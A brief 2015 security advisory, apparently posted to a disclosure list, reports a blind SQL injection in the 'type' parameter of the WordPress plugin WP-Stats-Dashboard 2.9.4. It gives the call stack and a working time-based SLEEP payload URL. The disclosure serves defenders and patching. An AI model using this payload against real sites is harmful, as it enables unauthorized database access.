Subject: SQL injection in WP-Stats-Dashboard 2.9.4

Date: Tue, 25 Aug 2015 11:32:44 +0200

Hello,

Plugin: WP-Stats-Dashboard 2.9.4 https://wordpress.org/plugins/wp-stats-dashboard/

1. Blind SQL injection

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection)

Method: GET

Url: http://localhost/wp-content/plugins/wp-stats-dashboard/view/admin/graph_trend.php?type=1[sqli]

Vulnerable parameters: type

Example PHP callstack:

/wp-stats-dashboard/view/admin/graph_trend.php:36

WPSDTrendsDao::getStats [/wp-stats-dashboard/classes/dao/WPSDTrendsDao.php:134]

wpdb::get_results

Verification:

http://localhost/wp-content/plugins/wp-stats-dashboard/view/admin/graph_trend.php?type=1%20or%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)%20--%20-

--

Regards,
Marcin Probola,